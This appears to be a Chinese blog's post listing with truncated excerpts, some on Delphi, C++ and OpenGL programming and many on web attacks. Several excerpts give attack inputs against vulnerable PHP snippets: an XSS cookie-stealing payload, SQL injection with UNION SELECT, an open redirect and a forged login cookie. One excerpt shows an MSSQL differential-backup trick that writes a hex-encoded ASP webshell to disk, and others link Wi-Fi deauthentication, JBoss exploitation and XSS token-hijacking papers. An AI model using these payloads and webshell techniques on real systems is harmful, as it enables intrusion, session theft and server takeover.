摘要:
[From http://www.cnblogs.com/luluping/archive/2010/11/15/1877817.html][Genosage]股票数据的获取目前有如下两种方法可以获取:1. http/javascript接口取数据2. web-service接口1.http/javascript接口取数据1.1Sina股票数据接口以大秦铁路(股票代码:601006)为例,如果要获取它的最新行情,只需访问新浪的股票数据接口:http://hq.sinajs.cn/list=sh601006这个url会返回一串文本,例如:var hq_str_sh601006="大秦铁 阅读全文
摘要:
//2011-11-15 星期二 // 管理员的思维: 查找asp,php,jsp,.net脚本文件关键词 //我们的思维: <% Set fso = CreateObject("Scripting.FileSystemObject") sFile = Server.Mappath("/index.asp") Set objFile = fso.GetFile(sFile) if objFile.attributes <> 32 then:objFile.attributes = 32:end if fso.CopyFile Serve 阅读全文
摘要:
//2011-11-14 星期一 // 程序员的思维: // Micropoor.php ---代码片段 <?php redirect_page = $_GET['page']; header ("Location: " . redirect_page); ?> Exp:Micropoor.php?page=http://hi.baidu.com/micropoor // 程序员的思维: <?php echo "Hello Micropoor" . $_SERVER['HTTP_REFERER']; ?& 阅读全文
摘要:
//2011-11-13 星期日 // 程序员的思维: // Micropoor.php ---代码片段 <?php $id= $_GET['id']; $query= "SELECT * FROM users WHERE id= ' “ .$id." ;" //略 ?> //我们的思维: index.php?id=1+UNION+SELECT+1,@@version+from+users-- // 程序员的思维: //Micropoor.php ---代码片段 <? $user = $_POST['user 阅读全文
摘要:
// 2011-11-12 星期六 // 程序员的思维: // index.php ---代码片段 <?php $Micropoor = $_GET['Micropoor']; print $Micropoor; ?> //我们的思维: index.php?Micropoor=<script>alert(document.cookie)</script> ############################################################ // 程序员的思维: // index.php ---代码片段 &l 阅读全文
摘要:
//2011-11-11 星期五 //php 程序员的思维: // login.php ---代码片段 if($adminuser==$user and $adminpass==$pass) { setcookie("login","yes",time()+3600); header("location:admin.php"); } //我们的思维: javascript:alert(document.cookie="login="+escape("yes")) ################ 阅读全文
摘要:
// http://hi.baidu.com/micropoor// 2011-11-10// Coder <?php echo '<p>Micropoor.</p>'; ?> //有效 <? echo '<p>Micropoor.</p>'; ?> //有效 // Hacker<script language = 'php'> echo '<p>Micropoor.</p>' ; </script> //有效 阅读全文
摘要:
// http://hi.baidu.com/micropoor// 2011-11-09 // Coderecho "This is The $Micropoor"."s"; //有效 echo "This is The ".$Micropoor."s"; //有效// Hacker$Micropoor = 'Bug'; echo "This is The $Micropoors";// 无效;字母s会被当成有效的变量名组成元素,但是这里的变量是$Micropoor echo 阅读全文
该文被密码保护。 阅读全文
摘要:
可以用来把用户下线,强制重连,从而获得握手包......我是这么想的...熄灯后试试。http://files.cnblogs.com/noevil/Mdk3.pdf 阅读全文
摘要:
Fuzzing Frameworkshttp://files.cnblogs.com/noevil/FuzzingFrameworks.pdf用Python Fuzzing的,收藏。 阅读全文
摘要:
还是exploit-db上的paperToken Hijacking with XSShttp://files.cnblogs.com/noevil/TokenHijackingWithXSS.pdf 阅读全文
摘要:
比war那个好利用点,至少不用费尽的打包了。http://files.cnblogs.com/noevil/JBossExploitation.pdf 阅读全文
摘要:
/** 转载,依然是转载。*/v1._110818 changes:1) 增加了一些装的技术细节周五的晚上闲着没事,最近似乎装b指南比较火,我也随便写一个,开心就好。一) 准备工作“工欲善其事必先利其器。”1) 电脑不一定要配置高,但是双屏是必须的,越大越好,能一个横屏一个竖屏更好。一个用来查资料,一个用来写代码。总之要显得信息量很大,效率很高。2) 椅子不一定要舒服,但是一定要可以半躺着。3) 大量的便签,各种的颜色的,用来记录每天要完成的事务,多多益善。沿着电脑屏幕的边框,尽量贴满,显出有很多事情的样子。4) 工具书,orelly的,机械工业,电子工业什么的都可以,能英文就英文,不行影印. 阅读全文
摘要:
顶80SEC的牛。转载开始。深掘XSS漏洞场景之XSS Rootkit[完整修订版]EMail: rayh4c#80sec.comSite: http://www.80sec.comDate: 2011-10-150×00 前言众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久型和非持久型两种:1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。3. DOM 阅读全文
摘要:
http://www.backtrack-linux.org/wiki/index.php/RFID_Cooking_with_Mifare_Classic 阅读全文
该文被密码保护。 阅读全文
摘要:
Here's to the crazy ones. The misfits. The rebels. The troublemakers. The round pegs in the square holes. The ones who see things differently. They're not fond of rules. And they have no respect for the status quo. You can quote them, disagree with them, glorify or vilify them. About the onl 阅读全文
摘要:
[ 转载开始... ]1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORM 阅读全文
摘要:
#include <stdio.h>#include <iostream>#include <windows.h>#include <string.h>#include "HTTPCore/HTTP.h"#include "HTTPCore/HTTPCore.h"#pragma comment(lib, "HTTPCore.lib")#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "ssleay3 阅读全文
摘要:
<?php error_reporting(0); date_default_timezone_set('Asia/Shanghai'); // SETTING$password = ''; // PASSWORD OF DOUBLE MD5$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE$smtpserverport = 25; // SMTP PORT$smtpusermail = 'noevilsparrow@yahoo.cn'; // SMTP USER$ 阅读全文
摘要:
procedure TForm1.Button1Click(Sender: TObject);Var frmRegion, tempRegion: HRGN; i: Integer; Arect: TRect;Begin frmRegion := 0; For I:= 0 To ControlCount - 1 Do Begin aRect := Controls[i].BoundsRect; OffsetRect( aRect, clientorigin.x - left, clientorigin.y - top ); tempRegion := CreateRectRgnIndirect 阅读全文
摘要:
unit Unit1;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ExtCtrls, StdCtrls;typeTMyThread = class(TThread) private { Private declarations } procedure AddTh; procedure DecTh; protected procedure Execute; override; end; TForm1 = class(TForm) Edit1: T 阅读全文
摘要:
惨无人道的转载开始。Delphi 支持三种文件类型: 文本文件、记录文件、无类型文件。文本文件是以行为单位进行读、写的。由于每一行的长度不一定相同,不能计算出给定行在文件中的确切位置,因而只能顺序地读写。文本文件只能单独为读或写而打开,在一个打开的文本文件上同时进行读、写操作是不允许的。文本文件的打开需要两个步骤:1.文件变量与文件名关联;2.初始化读写。1.文件变量与文件名关联:AssignFile(VarTxt, FileName);FileName 如果省略路径将默认当前目录。2.初始化读写有三种方式:(1) Reset: 只读打开, 指针移到文件头;(2) Rewrite: 创建新文件 阅读全文
摘要:
继续惨无人道的转载。var List: TStringList; i: Integer;begin List := TStringList.Create; List.Add('Strings1'); {添加} List.Add('Strings2'); List.Exchange(0,1); {置换} List.Insert(0,'Strings3'); {插入} i := List.IndexOf('Strings1'); {第一次出现的位置} List.Sort; {排序} List.Sorted := True; {指定排序 阅读全文
摘要:
惨无人道的转载开始。/*var CS: TRTLCriticalSection; {声明一个 TRTLCriticalSection 结构类型变量; 它应该是全局的}InitializeCriticalSection(CS); {初始化}EnterCriticalSection(CS); {开始: 轮到我了其他线程走开}LeaveCriticalSection(CS); {结束: 其他线程可以来了}DeleteCriticalSection(CS); {删除: 注意不能过早删除}也可用 TryEnterCriticalSection 替代 EnterCriticalSection.*/unit 阅读全文
摘要:
惨无人道的转载开始!现在, Delphi 的多线程已经非常易用了!先看一个非多线程的例子, 代码执行时不能进行其它操作(譬如拖动窗体):{自定义方法: 在窗体上绘制...}procedure MyMethod;var i: Integer;begin for i := 0 to 500000 do begin Form1.Canvas.Lock; Form1.Canvas.TextOut(10, 10, IntToStr(i)); Form1.Canvas.Unlock; end;end;{调用上面的自定义方法}procedure TForm1.Button1Click(Sender: TOb 阅读全文
摘要:
<C++标准函数库>中说的 有三个函数可以将字符串的内容转换为字符数组和C—string 1.data(),返回没有”\0“的字符串数组 2,c_str(),返回有”\0“的字符串数组 3,copy().................................................................int 转 CString:CString.Format("%d",int);.................................................................string 转 CStri 阅读全文
摘要:
(真闹心......)操作符 描述 \ 转义符 (), (?:), (?=), [] 圆括号和方括号 *, +, ?, {n}, {n,}, {n,m} 限定符 ^, $, \anymetacharacter 位置和顺序 | “或”操作 全部符号解释 字符 描述 \ 将下一个字符标记为一个特殊字符、或一个原义字符、或一个 向后引用、或一个八进制转义符。例如,'n' 匹配字符 "n"。'\n' 匹配一个换行符。序列 '\\' 匹配 "\" 而 "\(" 则匹配 "("。 ^ 匹配输入字符串的开始位置。如果设置了 RegExp 对象的 Multiline 属性,^ 也匹配 阅读全文
摘要:
Standalone versionThe standalone version comes with a JavaScript file to simplify configuring and embedding the player. This file includes theswfobjectlibrary.Note: the zip file includes two other files:audio-player-noswfobject.js(a version of audio-player.js without the swfobject library if you are 阅读全文
摘要:
RT,转载开始。 阅读全文
摘要:
今天闲来无事,就去看了下原来申请的一个国外空间。上面安放着 Vino 3.14 ,自己一行行敲的代码啊!那界面看的我异常的亢奋。 阅读全文
摘要:
原帖地址:http://www.programfan.com/club/showbbs.asp?id=184525本次课程所要讲的是绘制简单的几何图形,在实际绘制之前,让我们先熟悉一些概念。一、点、直线和多边形我们知道数学(具体的说,是几何学)中有点、直线和多边形的概念,但这些概念在计算机中会有所不同。数学上的点,只有位置,没有大小。但在计算机中,无论计算精度如何提高,始终不能表示一个无穷小的点。... 阅读全文
摘要:
[转载开始] 最近,看到国家下文告诉社会07年有XXX万,08年还有XXX万,09年还有600多万大学生等待找工作。希望大学生们"先就业再择业"。为什么我毕业时候国家没下这个文呢。。。闲话不说,做主管岗位6年了,看过几千封简历。这2周,公司大规模招聘,我基本就干一件事情,看简历。一天 300~500封。早中晚各看一次。找工作很难吗?不难,让HR通知你面试就是成功第一步。唉,现在的高校毕业办的人都... 阅读全文
摘要:
前几天刚把VS2008换成VS2010,应该方法类似吧。 [惨无人道的转载开始] visual studio2008发布已经很久了,但是Google了一下却没有多少篇文章讲关于配置OpenGL环境的,强大的visual studio2008已经非常人性化了,比起其他开发工具来说,visual studio2008的OpenGL配置实在太简单了,下面就setp by setp地教大家配置,首先下... 阅读全文